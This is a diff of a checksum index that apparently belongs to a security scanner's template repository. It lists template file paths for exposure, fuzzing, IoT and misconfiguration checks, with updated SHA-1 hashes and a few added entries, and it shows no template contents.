+http/exposures/configs/javascript-env.yaml:6eed3f19aa879fd9c05e12d969cf47aae8b954a9 http/exposures/configs/jetbrains-datasources.yaml:da58a71baf645e0fb838835cf7d578c2479c5cde -http/exposures/configs/jkstatus-manager.yaml:bf2d4e2bb74cbc61d04075a1ed4dbf3b366d14c1 +http/exposures/configs/jkstatus-manager.yaml:f68aafd53dcc1a226d690c69a7d776622ef1278f http/exposures/configs/joomla-config-file.yaml:8535eef26cf36993bd53f6d0699f53a9d7a2c3cf http/exposures/configs/karma-config-js.yaml:a08010314d86f1ffa8a650d775e376220fb2e4eb http/exposures/configs/keycloak-openid-config.yaml:38150de67170e7d3fa481e7e5cef51a403cb28d9 -http/exposures/configs/kubernetes-kustomization-disclosure.yaml:3cc2c354b1bf8effe68da9b0cdec39aa7dfde56f -http/exposures/configs/kyan-credential-exposure.yaml:2aede712eb9a44c065ab0273f86967d0051c453c +http/exposures/configs/kubernetes-kustomization-disclosure.yaml:b1048959a12117a9fc76a9f264ed7a871d15ef96 +http/exposures/configs/kyan-credential-exposure.yaml:4fd7eadf3dd175c87372cc4ee81d371688089041 http/exposures/configs/laravel-env.yaml:4407facf2b242affa0211f195ed0368018c1a7e5 http/exposures/configs/lvmeng-uts-disclosure.yaml:fa27474e223240c41b9f219c7c5a27448f60f4df http/exposures/configs/magento-config-disclosure.yaml:5f28bad1af733e89e56632221912f9e76c4f6aeb @@ -3305,7 +3433,7 @@ http/exposures/configs/nginx-config.yaml:03b6126bd62bd61ee1db1f48c00ca864e891fc8 http/exposures/configs/opcache-status-exposure.yaml:aaa23c897a5ab36b04634dec86c84fb65bedf74c http/exposures/configs/oracle-cgi-printenv.yaml:0cd3988f5489d110ec1ec907ee33011b5e58ffd3 http/exposures/configs/oracle-ebs-credentials.yaml:06f529deea20dd725a2fa6ffa1a4381b438aca71 -http/exposures/configs/ovpn-config-exposed.yaml:8b9fbda5032df5108a3df873b4434abe494bc4fb +http/exposures/configs/ovpn-config-exposed.yaml:e52d7eed4e4ff0ada6fe0ab6b72f7d726e562552 http/exposures/configs/owncloud-config.yaml:992c09865cd29069e13ef7c92c7ded00a60b3d96 http/exposures/configs/package-json.yaml:1f65f32ad1fcba4094196a8ed317698f4032bc85 http/exposures/configs/parameters-config.yaml:0c0a962092c6e76235625bc2c353e597f1aa9498 @@ -3316,7 +3444,7 @@ http/exposures/configs/phpinfo-files.yaml:f5fe594b96b5aff807be8736fc2259d81e7dae http/exposures/configs/phpsec-config.yaml:044ade30ee7b0fd9947635148359b7a8c56d5cf5 http/exposures/configs/phpstan-config.yaml:12f1b71e365d151b6a91d9be8fff27e78b0f3ec6 http/exposures/configs/pipfile-config.yaml:2f6733da1fd0e6b2ebb5223d3b5c6560162b3c42 -http/exposures/configs/platformio-ini.yaml:27a81a1327656eee95ab9a67655f91013737298f +http/exposures/configs/platformio-ini.yaml:d07a50168fad914a37a18d6171607dd47ff19238 http/exposures/configs/plesk-stat.yaml:71f84160396c0c272a402af28454c49ab877b68c http/exposures/configs/pre-commit-config.yaml:9d2e681024edf3a07278fca717f232b9401a6b83 http/exposures/configs/procfile-config.yaml:ffc423d7dd75bd558483d746b1d0ab7d7b3252bb @@ -3347,7 +3475,7 @@ http/exposures/configs/sftp-deployment-config.yaml:36ee5cdf5de0706bd46c10cd14387 http/exposures/configs/ssh-authorized-keys.yaml:a4b9cb7f10cf44a7725bc3af6e9373fbf8a16cfe http/exposures/configs/ssh-known-hosts.yaml:f2586ff22dbe492fefcf697483b24ce937176afb http/exposures/configs/stestr-config.yaml:3f8bb4a10a8db4aa07e9fe055873f1bd846395ba -http/exposures/configs/svnserve-config.yaml:9cc2f93767f08c91384a52c1816e355308b5d9a6 +http/exposures/configs/svnserve-config.yaml:18b9adc26ecff7b257824a66df1036e8c4d9fbba http/exposures/configs/symfony-database-config.yaml:7ee5ad97209411abe38df34bca4abb6af59bb93f http/exposures/configs/symfony-profiler.yaml:0a0ebea11fe07e8d0acea969c1db5a7e20efe8a0 http/exposures/configs/symfony-security-config.yaml:2f4b32309ba278d1ed03a3c5158d19356676d517 @@ -3430,7 +3558,7 @@ http/exposures/files/pipfile-lock.yaml:783fde784775ee5bd5f67a0e4fcf9a1cc75f2495 http/exposures/files/putty-private-key-disclosure.yaml:278a016cc534adccab19e6a2be6613d135867f92 http/exposures/files/pyproject-disclosure.yaml:c62f963b2937dcc7a368ce75a9f563f8fa7b464b http/exposures/files/rails-secret-token-disclosure.yaml:af2d34def00188d0a62512c192f75b0744fa1284 -http/exposures/files/reactapp-env-js.yaml:e04c0318c21c171bf888a534f3e2677a45e91da9 +http/exposures/files/reactapp-env-js.yaml:24a242fcd9e3f7cc791532d80184737653dceaaf http/exposures/files/readme-md.yaml:5210c501f1fab2404caa225dfddb15ec09d3a771 http/exposures/files/redmine-config.yaml:aaefbcf8521329ceb3355d8250c28938d9c0da99 http/exposures/files/redmine-settings.yaml:da37ae4e779155e6ec3a7dc3d969044ad97ddb21 @@ -3488,15 +3616,15 @@ http/exposures/logs/lucee-stack-trace.yaml:647c4f9866a08efd7e0374b8102ed809fa1cc http/exposures/logs/nginx-shards.yaml:b260d2f517de81a596bd6ccb59c138d737b867ff http/exposures/logs/npm-debug-log.yaml:27ef7697ce31ba0fedef3185111e03c263ad270c http/exposures/logs/npm-log-file.yaml:ca2a2e7673f2313214fce4b3cd3813999abf649f -http/exposures/logs/opentsdb-status.yaml:f7c61542f174365f1acae20a79c72518d2d28c4c +http/exposures/logs/opentsdb-status.yaml:534769fa918fe0a4f8c0cdecac3b860a24d29524 http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml:0f416cf4b8aa6e7184fb12cc9790749313fcfd33 http/exposures/logs/php-debug-bar.yaml:04933cf7efdfe29fc453c9914098cf25791f8666 -http/exposures/logs/production-log.yaml:012362bee42b72a9376f7bd1372fac8ee6eb08c9 +http/exposures/logs/production-log.yaml:139467c968f11a2b2f52416022d83d5349f6bb23 http/exposures/logs/production-logs.yaml:fe62ec583b7603a696921c39cb3c7676f65fbf17 http/exposures/logs/pyramid-debug-toolbar.yaml:ab8cf35235d6fb9ba5acaa1cdbabbdcf330d1fa6 http/exposures/logs/rails-debug-mode.yaml:3dd495c2222d572497b157236eafac60092900ae http/exposures/logs/redis-exception-error.yaml:6a38c121fe6e1c01fc7fd0d42b479783772af726 -http/exposures/logs/roundcube-log-disclosure.yaml:7789ee32d6742361eaebe68145c232c2066cd2c5 +http/exposures/logs/roundcube-log-disclosure.yaml:ede7c68073c8296ba2a72b71cfdc4c819dfaae37 http/exposures/logs/squid-analysis-report-generator.yaml:a7f39b56d9126926ccfd28dff1a9907fd999254d http/exposures/logs/struts-debug-mode.yaml:b6b1b5c0af92c567d1e8a66db448185a1897f125 http/exposures/logs/struts-problem-report.yaml:2294a44003a00d66fbbf5772bb82b15511937aba @@ -3504,95 +3632,95 @@ http/exposures/logs/trace-axd-detect.yaml:317114a3baa88b27492da710674f117bf4dea3 http/exposures/logs/webalizer-xtended-stats.yaml:d2b171dbcdb9ad3a9d4987953a85525b1452eb09 http/exposures/logs/wp-app-log.yaml:403b825fbc57bca5d273e2c0b98cc2911b58a4eb http/exposures/logs/ws-ftp-log.yaml:464817255594194585169872fb8d67e646ac9dd1 -http/exposures/logs/yii-error-page.yaml:ea0bf04a5aecb2bdc9db1c6355c40b9036655427 +http/exposures/logs/yii-error-page.yaml:43b710dceaab18cb5a478813c82869c844fd7a03 http/exposures/logs/zm-system-log-detect.yaml:8cacf6ab0c02570efc6af8f4200c9e5333f769f3 -http/exposures/tokens/adobe/adobe-oauth-secret.yaml:a83c01a9824e1df5daf79ac780bf723d9237196b -http/exposures/tokens/age/age-public-key.yaml:55056b641b1d00a41517cabae09eebbc15454e2b -http/exposures/tokens/age/age-secret-key.yaml:447bfb8451f11c8cbab110dbb34cf705fe02082b +http/exposures/tokens/adobe/adobe-oauth-secret.yaml:0e8c2085c91d97e3ca4201ffcb813f8eced6ad00 +http/exposures/tokens/age/age-public-key.yaml:50ce3214c7641880e7250fce4e13865905cfe354 +http/exposures/tokens/age/age-secret-key.yaml:67bd669aa717f4a4f436a82ef65f94ef59b44eef http/exposures/tokens/amazon/amazon-mws-auth-token.yaml:fd102ecb9568eb7f35ac700379689e38c556462e http/exposures/tokens/amazon/amazon-sns-topic.yaml:7594a7fcb1bb8fbb96d7eff0253f2d8fc3224af0 http/exposures/tokens/amazon/aws-access-key-value.yaml:640c6c7825c6ed936c0bf0d237d9dd831049a4fd -http/exposures/tokens/amazon/aws-access-secret-key.yaml:9c264da40f3ec30bf7ac027c50e6d1ea4b559b0c -http/exposures/tokens/amazon/aws-account-id.yaml:a204f52ef4a6574fa7ff2d0c025ea25dc44cd638 -http/exposures/tokens/amazon/aws-api-key.yaml:2c6d9ce025374cb757ac093f217a15889c8174ae -http/exposures/tokens/amazon/aws-session-token.yaml:19b5e7e1573d5d52838b2bf62fc00a83e780b63e +http/exposures/tokens/amazon/aws-access-secret-key.yaml:8c51bb45fa1574a1c6582093a412ae650eb1d899 +http/exposures/tokens/amazon/aws-account-id.yaml:22397c73613bed14a92a2d1fa1361e57cee98205 +http/exposures/tokens/amazon/aws-api-key.yaml:96b46e1ddb221680c9391ade5046843ca3f02119 +http/exposures/tokens/amazon/aws-session-token.yaml:350024b94436599a5ddfb221bad8b8dd8a0c27f9 http/exposures/tokens/artifactory/artifactory-api-password.yaml:49f25553cd2fdf079b0d15538d97b5a0e1da2af1 http/exposures/tokens/artifactory/artifactory-api-token.yaml:fd5c54e9de8f3c604d7049c8ada16ca51b3b5901 http/exposures/tokens/azure/azure-apim-secretkey.yaml:5408ee0ab817cb9085955684e452a1ac7eb641a0 -http/exposures/tokens/azure/azure-connection.yaml:9a74cd65a90537a0506d93fd1a49b35c26ed21fd +http/exposures/tokens/azure/azure-connection.yaml:db002ce072abc90fb25983fc89bf6c2121619304 http/exposures/tokens/bitly/bitly-secret-key.yaml:c2dde65c215d3f9a5ce240f1c2b048d804da35f5 http/exposures/tokens/cloudinary/cloudinary-credentials.yaml:b7a13de831c47edddcdd4d28ccb4a29c4369b0b8 -http/exposures/tokens/codeclimate/codeclimate-token.yaml:3fbcc5c805464dda68b0d7cd63d480ad798f4c20 -http/exposures/tokens/crates/crates-api-key.yaml:558b37a5bc1d8d757cd3d52a1ac4a4942c974e12 +http/exposures/tokens/codeclimate/codeclimate-token.yaml:d9d3e0fd01229aea841718aca94e595712da4770 +http/exposures/tokens/crates/crates-api-key.yaml:964741ab4bc7470813308010374eb3e0cacd7503 http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml:1700f4f6983cb6dea252877bfbe6253152e18036 -http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml:23a18c92fe74191d8f13bdd3f12dbe040e9e7419 -http/exposures/tokens/digitalocean/digitalocean-app-token.yaml:9542ece1d13129a9cc0756555e46534c7497a5c8 -http/exposures/tokens/digitalocean/digitalocean-refresh.yaml:3218a16a3ce3f7869e252d14769b46123a8b5870 +http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml:e86c4f910d11329d66bde4aa1646ef76776db0b8 +http/exposures/tokens/digitalocean/digitalocean-app-token.yaml:a320b994fa1d0e20dd3582fb633bb424eeb3f30f +http/exposures/tokens/digitalocean/digitalocean-refresh.yaml:38c4cbf3a782accbb572bc2115e936896cc099ef http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml:3824c03d3086e601c4428855925647e50107ff4b http/exposures/tokens/discord/discord-webhook.yaml:d7f617be153c665ae4182565b2dfe6b84fe20cdd http/exposures/tokens/docker/dockercfg-config.yaml:c53a3a2ab08b76f1379be0d14e25810429322cd5 -http/exposures/tokens/dynatrace/dynatrace-api-token.yaml:bef5866fea1c1faf8c83cb7036c892d51522b6a2 -http/exposures/tokens/facebook/facebook-access-token.yaml:02fa16706aa2da53e709c7e29ddf025f7fbaa7a4 -http/exposures/tokens/figma/figma-personal-token.yaml:8d5bfef01b99d85bdc19eec660050b7caa228b1f +http/exposures/tokens/dynatrace/dynatrace-api-token.yaml:db2c64f7c4d9be84ad9c88f77e1c24d42e2c8d1a +http/exposures/tokens/facebook/facebook-access-token.yaml:187e5e5960e63d0dcb662141dd9ceefdee174926 +http/exposures/tokens/figma/figma-personal-token.yaml:56f564818f31bf3f98f5db3553087f75e925e4ca http/exposures/tokens/generic/credentials-disclosure.yaml:5a542867e3bb02ad04c5550004f62ec927255f52 http/exposures/tokens/generic/general-tokens.yaml:3cc0291863349755c1b832b44701dd9e0c28927b http/exposures/tokens/generic/jdbc-connection-string.yaml:8bf030518f055fbc95e13b031d430963462f275b http/exposures/tokens/generic/jwt-token.yaml:063c7c06aea5a2f53690438ba94abe34feb9a54b http/exposures/tokens/generic/shoppable-token.yaml:90ff95ee2b2510c514735ec950899000b6f5cdb2 -http/exposures/tokens/github/github-app.yaml:5109c5f8275816c42811ec6f4b467190cd2f7e02 -http/exposures/tokens/github/github-oauth-access.yaml:f4102e78222f891a0d0c577cb78baf4afb5bf558 -http/exposures/tokens/github/github-personal-access.yaml:d3827706c482db03fd111f0001908038e3974ed9 -http/exposures/tokens/github/github-refresh.yaml:1fb931262d0bd2eea10763b6cbc8254885a8cd24 -http/exposures/tokens/gitlab/gitlab-personal-token.yaml:cdfd37a404c45e3ee5f4a106790d12e4defc0fc7 -http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml:ae90b5c84f7f36e40dc5f328de6e7812520f689e -http/exposures/tokens/gitlab/gitlab-runner-token.yaml:06979da4829d25f794e1cca7877962849d05907e +http/exposures/tokens/github/github-app.yaml:372884c589f816afd5ffb051549a9ced0de818e8 +http/exposures/tokens/github/github-oauth-access.yaml:41354d114937efb311387aec17d3cd380856e566 +http/exposures/tokens/github/github-personal-access.yaml:920456d6d8da73759bb9533be9532b06e39d17e4 +http/exposures/tokens/github/github-refresh.yaml:eb866bdb689301264531c586db0bd3ea08f56a53 +http/exposures/tokens/gitlab/gitlab-personal-token.yaml:7aa011c982413491bfd1f54301b1e06a1ac97bfe +http/exposures/tokens/gitlab/gitlab-pipeline-token.yaml:29becba031ac086e8897baef0052d125ccdbd4a0 +http/exposures/tokens/gitlab/gitlab-runner-token.yaml:bc9680f7658df3f0640067525e9a5e0cbd55bff2 http/exposures/tokens/google/fcm-server-key.yaml:11d27e411e4510d9c4324de7233c32e409c2434d http/exposures/tokens/google/google-api-key.yaml:9f94796ea92fcc33ad0bdc36c26bcf63d2bb168c http/exposures/tokens/google/google-calendar-link.yaml:32d53e23b6b56f4efe6c591d7ee21fd599a28278 -http/exposures/tokens/google/google-client-id.yaml:78c0a4b99b74e206100953a376020212d1507a54 -http/exposures/tokens/google/google-oauth-prefixed.yaml:6e19a871a7b4a58f7b7eb0b783f1ebd5f67660b5 +http/exposures/tokens/google/google-client-id.yaml:ecbc67c387f296966dc8151f1439c937d4ce3356 +http/exposures/tokens/google/google-oauth-prefixed.yaml:ef28d0b58c8a42de3930f04b435b20dab340d254 http/exposures/tokens/google/oauth-access-key.yaml:ab4acaa34b2b928fb7c5456064864ef6adef032c -http/exposures/tokens/heroku/heroku-api-key.yaml:9ef6eec45b9a256f790cdfad7f6d35043aaf1112 -http/exposures/tokens/jenkins/jenkins-crumb-token.yaml:0f57edbb79d9094d9d5f2965fd54c21c3250b5d0 +http/exposures/tokens/heroku/heroku-api-key.yaml:30b4cddecd0c9b8f41d8d13f7badd0251bd6bd1a +http/exposures/tokens/jenkins/jenkins-crumb-token.yaml:693bb51593134063bd266b19573f3e0a5c8fa74a http/exposures/tokens/loqate/loqate-api-key.yaml:6f3c072743f3fe4f8fe67365e2aab7a873b0da19 http/exposures/tokens/mailchimp/mailchimp-api-key.yaml:264061c78e2406ad2e85ce9682cc889c97d8f663 -http/exposures/tokens/mailgun/mailgun-api-token.yaml:7f89c4e84a315e198fabae4deac0595e96e739f8 -http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml:2d5d264a043c95f2d3f6ec7139713a586f1cf1e4 +http/exposures/tokens/mailgun/mailgun-api-token.yaml:6c37364bdf78e0e98b5694ac777a5b8f20a8a5dd +http/exposures/tokens/mapbox/mapbox-token-disclosure.yaml:99ea0aa7bdca25e29a536fde8892388f2c367bd6 http/exposures/tokens/microsoft/microsoft-teams-webhook.yaml:6035252900263bc011028e12f548e2fc292c963c http/exposures/tokens/newrelic/newrelic-admin-api-key.yaml:0875bea3b12babd7e2a09dd32c0d82635044315b http/exposures/tokens/newrelic/newrelic-insights-key.yaml:faba7e9d689c4cad4aa5427f9e1a9ebc651558ca -http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml:004054f261eafa6e4556a3beb60783f772a163d0 -http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml:78c72ca1b035be5900dd097655fc75ab30b3f4b5 +http/exposures/tokens/newrelic/newrelic-pixie-api-key.yaml:563d882592df8ebdfa0793e1c79d896105746047 +http/exposures/tokens/newrelic/newrelic-pixie-deploy-key.yaml:e074c03bf6d74a915928c6a0141c035705bfc8ff http/exposures/tokens/newrelic/newrelic-rest-api-key.yaml:ab35d948bce7bdc75b79e8581c7b71fe0cb4041a http/exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml:47b687ea15d91d9f9227a592de2b081c404993b4 http/exposures/tokens/nextjs/cipher-secret-key.yaml:22ab7b8599a4ec6d7e48ef944b3091d23a17dac1 -http/exposures/tokens/npm/npm-access-token.yaml:7954ce09fa086b639cfb950331e24ce64f6bf2e1 -http/exposures/tokens/nuget/nuget-api-key.yaml:b8f4599a92adb25da76ff2a55c8df2c19531118c -http/exposures/tokens/openai/openai-api-key.yaml:785c8c9fa3c4510d63f8fca11022ffd9d36b51d3 +http/exposures/tokens/npm/npm-access-token.yaml:25aba806075834526ed0517ee6b233ad123eedd4 +http/exposures/tokens/nuget/nuget-api-key.yaml:fde3e6fbfcee2f81edc201409993a090d8e5b989 +http/exposures/tokens/openai/openai-api-key.yaml:2de56a5edae8c02b0ee17a28e5bfc196fc5b8a69 http/exposures/tokens/paypal/braintree-access-token.yaml:3bb673a27f90f225a7d9ccb6e1b96eea4572d2d1 http/exposures/tokens/picatic/picatic-api-key.yaml:98a6bcac24fdceecda916d9f749b15ef76bf00de -http/exposures/tokens/postman/postman-key.yaml:0fe93ee261ee5329db59ad71e8d52d1af12be93f -http/exposures/tokens/pypi/pypi-upload-token.yaml:3f4c26eeb65a26c848b3872d0457ee85f93b4404 +http/exposures/tokens/postman/postman-key.yaml:475a09f7e5fb9169a587b007ef2e4ad85d431911 +http/exposures/tokens/pypi/pypi-upload-token.yaml:37567e647522bbb803430980ae1dd3414057cc0e http/exposures/tokens/razorpay/razorpay-clientid-disclosure.yaml:d479c84fd9cb9f83e2fec8213bc0ec1ce3237f4a -http/exposures/tokens/ruby/rubygems-api-key.yaml:c3c89b83a8db04daf342bd9018aafd44ab7a766e -http/exposures/tokens/sauce/sauce-token.yaml:2d70c5e70edfb885bc63dc168962c1eb2fe3500c -http/exposures/tokens/segment/segment-public-token.yaml:0a30548ca733d150d450e14641545ef73c8362d8 +http/exposures/tokens/ruby/rubygems-api-key.yaml:236c4cbc564d3355d28d2ba4bbf39d14b7db23a3 +http/exposures/tokens/sauce/sauce-token.yaml:2eb8301a803c5aab71ae4b5f1892511da9300752 +http/exposures/tokens/segment/segment-public-token.yaml:d0521b4b071cf7377a03e8d0d47a99aae135d607 http/exposures/tokens/sendgrid/sendgrid-api-key.yaml:f359e1eb5d3c4c24563d3bf58ef430f36bff4ea1 -http/exposures/tokens/shopify/shopify-app-secret.yaml:166802c7522ce7bcaebbfd9c520f6b6036ca247d -http/exposures/tokens/shopify/shopify-customapp-token.yaml:4c7477d6fcd894eeb56d88f040a1c4560865790e -http/exposures/tokens/shopify/shopify-legacy-token.yaml:13b5b80df61129b36978120aa181384476a70eef -http/exposures/tokens/shopify/shopify-public-token.yaml:4712114cf81d9bc046bd23b6e07bb8b89f400466 +http/exposures/tokens/shopify/shopify-app-secret.yaml:e401f1f43bbbfe6b5930fb0ba77f6e7360d6e611 +http/exposures/tokens/shopify/shopify-customapp-token.yaml:d5844405f481b75e59968b4043b69ad813c7d266 +http/exposures/tokens/shopify/shopify-legacy-token.yaml:ccb09eda02d73f1cf305bffad092c90c392d850b +http/exposures/tokens/shopify/shopify-public-token.yaml:de736318c852dae1c88eeea8eace85f60e76d36f http/exposures/tokens/slack/slack-bot-token.yaml:3be023d7fed90f2df4beecf0eb8454c5712e6ff5 http/exposures/tokens/slack/slack-user-token.yaml:dc346b7c079ade6f1aaf40a5442e643e77b2734b http/exposures/tokens/slack/slack-webhook-token.yaml:6cac53b49a5c97440a15633b1e965c4d9eddc9f2 http/exposures/tokens/sonarqube/sonarqube-token.yaml:728bcd924bfc5bc1e384215d4563d6df2870c811 -http/exposures/tokens/square/square-access.yaml:2142876ee1332d50f772db6b1a558bd25d07c76f -http/exposures/tokens/square/square-oauth-secret-token.yaml:b2469d48621fb07bcbd4fd52e5650ed2c7cacc1d -http/exposures/tokens/stackhawk/stackhawk-api.yaml:0b7195a895a96fdc170504388fffc824138127eb +http/exposures/tokens/square/square-access.yaml:5624d14acae33e5ff11eec4d85d1543ab6b3c856 +http/exposures/tokens/square/square-oauth-secret-token.yaml:880d7855545998dd214efa8ac50b8bc92ac5ee0e +http/exposures/tokens/stackhawk/stackhawk-api.yaml:33e8e3ab4448b49bf08f7e62858076c5bf82bf84 http/exposures/tokens/stripe/stripe-restricted-key.yaml:707075b2329acf12ec1f3228653e4fb3f6426456 http/exposures/tokens/stripe/stripe-secret-key.yaml:757da81ed9fdd37fa6512aa400d6419f2209959e -http/exposures/tokens/telegram/telegram-bot-token.yaml:ba1dce9b2d70818f988785a852cb133d1a457055 -http/exposures/tokens/twilio/twilio-api-key.yaml:997af63cde6fa512517d433e5dbf0f6064d56088 +http/exposures/tokens/telegram/telegram-bot-token.yaml:2deb75da979f2556867991584f7719e60447bcc5 +http/exposures/tokens/twilio/twilio-api-key.yaml:0f1ffb398e080bec661cdc0b9b65bfff89439374 http/exposures/tokens/zapier/zapier-webhook-token.yaml:3e324c33aa0195b60c1bd7ba914f5dba8e796c99 http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a11f235da97462561eae6c61720dbd2910667ffb http/exposures/tokens/zenserp/zenserp-api-key.yaml:b4be5f8873f420d6415dfe6a98632a47a5c4db01 @@ -3603,14 +3731,14 @@ http/fuzzing/iis-shortname.yaml:95066978c367d1cbff7dbd86e2f8f130301fc49b http/fuzzing/linux-lfi-fuzzing.yaml:b2ba75c5a35eb0d9e11734bddfdf75475cd9063d http/fuzzing/mdb-database-file.yaml:8665575c8c43b9129f43e9f7b565f6d7ea272606 http/fuzzing/prestashop-module-fuzz.yaml:fd9a6638e5a617a0479fdf8b2dd4c933a994d6ce -http/fuzzing/ssrf-via-proxy.yaml:4a7e45b97b7a5483b76c46d0b9f6ae9715e12071 +http/fuzzing/ssrf-via-proxy.yaml:31c3a4f5dd18d079868a2efae6963bc445bd4206 http/fuzzing/valid-gmail-check.yaml:84869196d4d931421cabc306ba04e0ad5a92fa40 -http/fuzzing/waf-fuzz.yaml:29f396a9fc1aefed74d796a8aafb09ed4a130466 +http/fuzzing/waf-fuzz.yaml:6972b211e32096a8c8d3e8c0eaf5faab0f75f0bd http/fuzzing/wordpress-plugins-detect.yaml:f6b1d680687f1557f0ac13ab31847526ac9b3a65 http/fuzzing/wordpress-themes-detect.yaml:6b715fabda93272b42fd97f3d3b0a84f736607d7 http/fuzzing/wordpress-weak-credentials.yaml:c1e1a9d05f04acf8e4ebb3faa47c7a0f4bd81dc9 http/fuzzing/xff-403-bypass.yaml:a97231901edc2b4f37838e4c8acc7cdd9f63bf00 -http/iot/ampguard-wifi-setup.yaml:c9dc29746bd233e8a7e33f06c0673aa0f0cc3027 +http/iot/ampguard-wifi-setup.yaml:3542bf7147cc65f073ccc1f044dec97c11a97731 http/iot/apc-ups-login.yaml:bc36c77902d114327df1815d872500108385cf96 http/iot/automation-direct.yaml:72f7379c9ed1a4295c7dfdcd6475dc9962b60ec7 http/iot/brother-printer-detect.yaml:2f9c6697555f12b6fcbb35b9ad9f9eea670f87ee @@ -3633,8 +3761,8 @@ http/iot/hue-personal-wireless-panel.yaml:c45b8ca61b9cbd44cc13d61230ee9325916154 http/iot/internet-service.yaml:2242c3bc8e5b6d78b053f88d503ddabf031f4c91 http/iot/iotawatt-app-exposure.yaml:92d309ad99642edf6b2696798baa0c02358c7815 http/iot/kevinlab-device-detect.yaml:55abc194947068d16115c8c276c77137c7f4b4f8 -http/iot/liveview-axis-camera.yaml:6296153730430fb9ff83f63ef0b4d86c1c832f6c -http/iot/loytec-device.yaml:db47004c86d36efc4cf3079b2e4972b919a36a6a +http/iot/liveview-axis-camera.yaml:b79a5c800914f98b043b3e3f4f59c46c23c727de +http/iot/loytec-device.yaml:37a6f53aa80908c9897d8338632029a7ce65c975 http/iot/mobotix-guest-camera.yaml:03050212d3735ab57759167e7d885c1cda0ebedd http/iot/netsurveillance-web.yaml:51167a2473f3cf5e89cfc0d1abdaf86613086905 http/iot/network-camera-detect.yaml:e0675c2cd383d1f6915c711dac643da5fdf342ef @@ -3648,7 +3776,7 @@ http/iot/qvisdvr-deserialization-rce.yaml:a5375894aa663226cc01b155b7bbfb59e8dc09 http/iot/raspberry-shake-config.yaml:ba160d26e7378dbd2336e413ba81476c9b48341d http/iot/routeros-login.yaml:25fd747e2e42fd9ab9af2866a3d4cab14eda28c3 http/iot/selea-ip-camera.yaml:de2919543690b0141c6274cd17ef488a48cf4dd4 -http/iot/snapdrop-detect.yaml:be266a4f0a4c23456b42784e55688f96503d993a +http/iot/snapdrop-detect.yaml:ad8a0782d3a0e6f2c69a3c28e0e17eef57f9a9ec http/iot/stem-audio-table-private-keys.yaml:5998144b17dd026c2ff2d3bb0f7b17c9b1942d94 http/iot/targa-camera-lfi.yaml:877621cd0ea33f65fc8aaf1580c7b75a48b723c9 http/iot/targa-camera-ssrf.yaml:83d56a87c14e9c3cb35dbfcff51140a1acfe9fa3 @@ -3662,27 +3790,28 @@ http/miscellaneous/addeventlistener-detect:23e4444e90c97c5a5a0ae9a0c7da3a62923d2 http/miscellaneous/apple-app-site-association.yaml:c6da929223cda667179226cfba083fc9692c7dac http/miscellaneous/aws-ecs-container-agent-tasks.yaml:169fca1a43acbc9c877b9c0c3df0141f2400d67e http/miscellaneous/clientaccesspolicy.yaml:d2ebcdf18a9e115d28ec5418618dde3de28439b6 +http/miscellaneous/crypto-mining-malware.yaml:5bb7d4b571266f921448d0d25bfbb059425c62fe http/miscellaneous/detect-dns-over-https.yaml:a0d05c1d3526c2368d9957b37ab44f6177772f8b http/miscellaneous/dir-listing.yaml:397e6f739d91d1935d49bdd18bb899b4072efcdd http/miscellaneous/email-extractor.yaml:e7e0fbbf86d8e36a15315fc86ac242166a0be63a http/miscellaneous/exposed-file-upload-form.yaml:ac60116640ef25b98810a4643bdd92020bfee1f4 http/miscellaneous/firebase-database-extractor.yaml:0c276fddfc49fdf19983f9ce36b40351af0aec57 http/miscellaneous/google-floc-disabled.yaml:b741fb4fc11cff0f2c861f961a8bfff633e05196 -http/miscellaneous/gpc-json.yaml:785351f7a7938a84981b5b1a7a14a1c2fa49dbb7 +http/miscellaneous/gpc-json.yaml:994f54409ea33bd6173cafd61e47f5c7bd0a807b http/miscellaneous/htaccess-config.yaml:6303070fdb7947f0a454fb705febf90e5f8e498a +http/miscellaneous/http-trace.yaml:fb4ed5a7e06bf82926a3ee0fc03ec3892e51f686 http/miscellaneous/joomla-htaccess.yaml:7161e4a0758ca3e02b231125c7aa30348e72c9f0 http/miscellaneous/joomla-manifest-file.yaml:436522a1656ec67d5cebd0d3fbd8676560935b1d http/miscellaneous/microsoft-azure-error.yaml:26004b001aeb9b8a337507daabc8f50e05bc3859 http/miscellaneous/moodle-changelog.yaml:2f5b4e81305c21b277d6f54fb002ea044eff500a http/miscellaneous/netflix-conductor-version.yaml:41a8f2d27ee7782b5df49c6305bc5bdc17a545af -http/miscellaneous/ntlm-directories.yaml:e3189ca09100ca42f927099426d5e09ee7966f65 -http/miscellaneous/old-copyright.yaml:1addbccda1ed75e5d362479b105e10d82e74371e +http/miscellaneous/ntlm-directories.yaml:f5c3bab9fa3ac6238150af38b7c142e5bb4fd951 +http/miscellaneous/old-copyright.yaml:82716187f88f1fcdef6264e04960f0dad37a90d6 http/miscellaneous/options-method.yaml:99929d85d875946d3debe94d08fcaeb41548d629 -http/miscellaneous/robots-txt-endpoint.yaml:2e793c7a6078641f5f0f7b29b6d52a33cfec6ee2 -http/miscellaneous/robots-txt.yaml:d87e00bef6ddcccdc224cbe6fc670974db41a32e +http/miscellaneous/robots-txt-endpoint.yaml:77a2aecea8dd753215ede1443d94a11144636610 +http/miscellaneous/robots-txt.yaml:43b0f22528ebff24084bee1b8542d3eaa45ee3e8 http/miscellaneous/security-txt.yaml:01860642627f2d383a9326d0ee0f939a14595ee0 -http/miscellaneous/sitemap-detect.yaml:7e2f010831cdb8eb836597a9f40da8fa64b7f2ac -http/miscellaneous/trace-method.yaml:9649cf124813d4b0473f8a23413aeea8ecda5599 +http/miscellaneous/sitemap-detect.yaml:896df94a32924657fe3dafc7dbe4ac63e7c7f7bb http/miscellaneous/x-recruiting-header.yaml:80823f643deba3532ed2ef4f1c735239cc6ede13 http/miscellaneous/xml-schema-detect.yaml:b872ff3f34ecb006eda8c630f1bfb9d313f54ace http/misconfiguration/ace-admin-dashboard.yaml:47e7319f4a226963e64b1fc834319aaa627f8268 @@ -3716,7 +3845,7 @@ http/misconfiguration/aem/aem-osgi-bundles.yaml:30b3d0776d31288ab39d8093cf742fa7 